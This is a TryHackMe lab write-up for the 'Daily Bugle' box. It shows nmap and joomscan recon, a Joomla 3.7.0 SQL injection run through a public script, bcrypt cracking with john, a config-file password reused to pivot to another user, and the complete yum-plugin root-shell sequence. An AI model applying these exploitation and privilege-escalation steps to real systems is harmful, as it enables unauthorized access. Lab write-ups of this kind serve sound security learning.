Daily Bugle
A hard Linux box from TryHackMe, use a SQLi in the particular joomla version to get access, finding a password to pivot, and then using GTFObins yum for root.
Recon
Starting with the default nmap scan
sudo nmap -sC -sV -oA nmap/dailybugle 10.10.78.145
Nmap scan report for 10.10.78.145
Host is up (0.20s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
Find just the server thats interesting, from the default scripts it even found a joomla directory, so the server is likely running that
Running joomscan on the server, see that it is indeed running joomla version 3.7.0
joomscan -u 10.10.78.145
...
[+] Detecting Joomla Version
[++] Joomla 3.7.0
...
A quick searchsploit on the version and it has a SQLi on one of it’s components, sweet
searchsploit joomla 3.7.0
---------------------------------------------------------------------------------- -----------------------
Exploit Title | Path
---------------------------------------------------------------------------------- -----------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt
---------------------------------------------------------------------------------- -----------------------
Exploitation
Searching google for an exploit on github, find something called joomblah that given a URL, will dump the database
Running the script with
python exploit.py http://10.10.78.145
Get the dumped SQL database in the form of a user (jonah), an email “jonah@tryhackme.com” and a bcrypt hash
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: fb9j5_users
- Extracting users from fb9j5_users
[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw
.V.d3p12kBtZutm', '', '']
Using john to crack it
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash.txt --format=bcrypt
And find the password to be “spiderman123”
Now have a complete set of creds, jonah:spiderman123, which work for joomla admin access, but not for ssh
Looking into the configuration files on the site though, find a set of creds
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
public $dbprefix = 'fb9j5_';
public $live_site = '';
public $secret = 'UAMBRWzHO3oFPmVC';
public $gzip = '0';
public $error_reporting = 'default';
public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}';
public $ftp_host = '127.0.0.1';
public $ftp_port = '21';
public $ftp_user = '';
public $ftp_pass = '';
public $ftp_root = '';
The password “nv5uz9r3ZEDzVjNu” doesnt work for root, but it does work for the jjameson user!
Going through all the usual motions for privesc, run sudo -l and find that jjameson can run “yum” as root
sudo -l
/bin/yum
Yum is a package manager, and can be used for root escalation by following GTFObins by running the following 4 commands to laod a custom program that just opens a shell using python
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y
And get root!